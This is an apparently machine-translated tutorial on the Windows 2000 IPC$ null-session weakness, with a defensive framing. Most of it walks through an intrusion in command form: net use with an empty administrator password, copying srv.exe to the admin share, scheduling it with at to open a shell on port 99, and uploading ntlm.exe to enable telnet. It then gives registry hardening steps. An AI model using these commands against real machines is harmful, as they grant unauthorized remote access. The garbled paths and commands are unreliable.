Deny hackers from spying on IPC. $ uncover the Vulnerability

I often hear people talk about the IPC vulnerability on the Internet. What is the IPC vulnerability? How do network hooligans exploit this vulnerability? With such a problem, let's take a look at the author's wonderful articles!

What is an IPC vulnerability?

IPC is a resource that shares Named Pipes and is important for inter-program communication. Used to remotely manage computers and view shared resources of computers. Using IPC, we can establish an empty connection with the target host (without the user name and password). Using this empty connection, we can also obtain the user list on the target host. However, some ulterior motives use IPC to search for our user list and use dictionary tools to attack our host.

How to exploit IPC Vulnerabilities

Attackers usually use the software "streamer" here. The rabbit reminds you that "streamer" is a very powerful software and must be noted when using it, illegal destruction is prohibited!

Step 1: Run streaming (the latest version is 4.6) and press CTRL + R to bring up the scan box. Here we will just perform a test, the purpose is to tell you the hazards of this vulnerability. Therefore, we can select an IP address for scanning. We scanned 127.0.0.1 (). The default value is used for all other items, and you do not need to change the settings.

Step 2: Open the command line that comes with Win2000. Note: we are not here to teach you how to destroy it, but to introduce the hazards of this vulnerability, so the following IP address is assumed, does not exist.

1. C:> net use \ 127.0.0.1IPC ""/user: "admintitrators"

This is the IP address that the user name scanned with "streamer" is "administrators" and the password is "empty". If it is an attacker, he will use this command to establish a connection with 127.0.0.1. Because the password is "null", the first quotation mark is not required. The user name in the next double quotation mark is used, enter the administrators command.

2. C:> copy srv.exe \ 127.0.0.1admin

Copy srv.exe first, which is available in the Tools directory of the streaming (here, it refers to the admin user's c: winntsystem32. You can also use c and d, which means drive c and drive d, it depends on where you want to copy it ).

3. C:> net time \ 127.0.0.1

Check the time and find that the current time of 127.0.0.1 is. The command is successfully completed.

4. C:> at \ 127.0.0.1 11: 05 srv.exe

Use the atcommand to start srv.exe (the time set here is faster than the host time, or how do you start it !)

5. C:> net time \ 127.0.0.1

Check the time? If the current time of 127.0.0.1 is, prepare to start the following command.

6. C:> telnet 127.0.0.1 99

The Telnet command is used here. Note that the port is 99. Telnet uses port 23 by default, but we use SRV to create a Shell with port 99 for us on the other computer.

Although we can Telnet up, But SRV is a one-time, the next login will be activated again! So we plan to establish a Telnet service! This requires ntlm.

7. C:> copy ntlm.exe \ 127.0.0.1admin

Use the copycommand to upload ntlm.exeto the Upload File (ntlm.exe is also in the Tools directory of "streaming light ).

8. C: WINNTsystem32> ntlm

Enter ntlm to start (Here C: WINNTsystem32> refers to the peer computer. Running ntlm actually allows this program to run on the peer computer ). When "DONE" appears, it indicates that it has been started normally. Then use "net start telnet" to enable the Telnet service!

Step 3: Use Telnet to connect to the recipient's computer, Telnet 127.0.0.1, and enter the user name and password. The operation is as simple as the operation on DOS!

How to Prevent IPC Vulnerabilities

After reading the above method, do you think you should check whether you have this vulnerability? If so, do you still need to fix it? Come with me. Here we will teach you how to prevent the intrusion of IPC vulnerabilities.

1. Do not create a null connection

First, Run regedit and find the form [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] to change the key value of RestrictAnonymous = DWORD to 00000001.

2. Prohibit management and sharing

Also, find the following key group [HKEY_LOCAL _ MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] and change the key value of AutoShareServer = DWORD to 00000000.

3. Go to www.heibai.net/download/show.php? Id1_2194&down00001download deldemo.zip. This tool automatically permanently deletes all the two batch files shared by default in Windows 2000.

4. If you are still in trouble, you can also put "net share ipc/delete" in your startup bar.

5. Of course, the simplest method is to make the password more complex, so as not to be cracked by malicious people using tools. However, I would like to remind you that any complicated password may be cracked.